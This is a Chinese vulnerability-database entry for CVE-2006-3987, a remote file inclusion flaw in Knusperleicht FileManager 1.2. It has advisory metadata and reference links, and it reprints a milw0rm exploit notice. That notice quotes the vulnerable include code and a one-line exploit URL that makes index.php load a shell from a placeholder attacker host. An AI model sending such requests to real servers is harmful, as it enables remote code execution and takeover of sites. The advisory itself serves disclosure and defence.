Knusperleicht FileManager 'index.php' PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110727 漏洞类型 输入验证
发布时间 2006-08-01 更新时间 2006-09-05
CVE编号 CVE-2006-3987 CNNVD-ID CNNVD-200608-062
漏洞平台 PHP CVSS评分 5.1
|漏洞来源
https://www.exploit-db.com/exploits/2104
https://cxsecurity.com/issue/WLB-2006080036
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-062
|漏洞详情
KnusperleichtFileManager1.2及早期版本中的index.php脚本存在多个PHP远程文件包含漏洞,远程攻击者可借助:(1)dwl_download_path参数,或(2)dwl_include_path参数中的URL执行任意PHP代码。
|漏洞EXP
#=================================================================
#K_fileManager v1.2 <= (dwl_include_path) Remote File Inclusion Exploit
#================================================================
#                                                                |
#Critical Level : Dangerous                                      |
#                                                                |
#Venedor site : http://knusperleicht.at/                         |
#                                                                |
#Version : 1.2                                                   |
#                                                                |
#=================================================================
#Bug in : index.php
#
#Vlu Code :
#--------------------------------
#/**********************************************************
#//  INCLUDE PATH
#@define("DWL_INCLUDE_PATH",$dwl_include_path);
#//  INCLUDE PATH
#//**********************************************************
#
#//Dateien importieren
#       require_once(DWL_INCLUDE_PATH."inc/config.inc.php");
#       require_once(DWL_INCLUDE_PATH."lang/".FM_LANGUAGE."/lang.inc.php");
#       require_once(DWL_INCLUDE_PATH."inc/Dwl_template.php");
#       require_once(DWL_INCLUDE_PATH."inc/Dwl_db.php");
#       require_once(DWL_INCLUDE_PATH."inc/Dwl_directory.php");
#       require_once(DWL_INCLUDE_PATH."inc/Dwl_stuff.php");
#       require_once(DWL_INCLUDE_PATH."inc/Dwl_statistic.php");
#
#
#=================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/index.php?dwl_include_path=http://SHELLURL.COM?
#
#===============================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#GreetZ : Bl@Ck^B1rd Semsemmasr Black_Scorpion Medo_Ye7ya Kambaa  NANA Kashtawa
#Skiing Gendiaaa Saw AzIZa SnIpEr_Sa Masry OSA FEGLA 3amer
=================================================================

# milw0rm.com [2006-08-01]
|参考资料

来源:XF
名称:filemanager-index-file-include(28128)
链接:http://xforce.iss.net/xforce/xfdb/28128
来源:BID
名称:19270
链接:http://www.securityfocus.com/bid/19270
来源:BUGTRAQ
名称:20060801[KurdishSecurity#19]FileManagerRemoteCommandExecution
链接:http://www.securityfocus.com/archive/1/archive/1/441813/100/0/threaded
来源:MILW0RM
名称:2104
链接:http://www.milw0rm.com/exploits/2104
来源:VUPEN
名称:ADV-2006-3089
链接:http://www.frsirt.com/english/advisories/2006/3089
来源:SECUNIA
名称:21294
链接:http://secunia.com/advisories/21294
来源:SREASON
名称:1327
链接:http://securityreason.com/securityalert/1327
来源:MILW0RM
名称:2104
链接:http://milw0rm.com/exploits/2104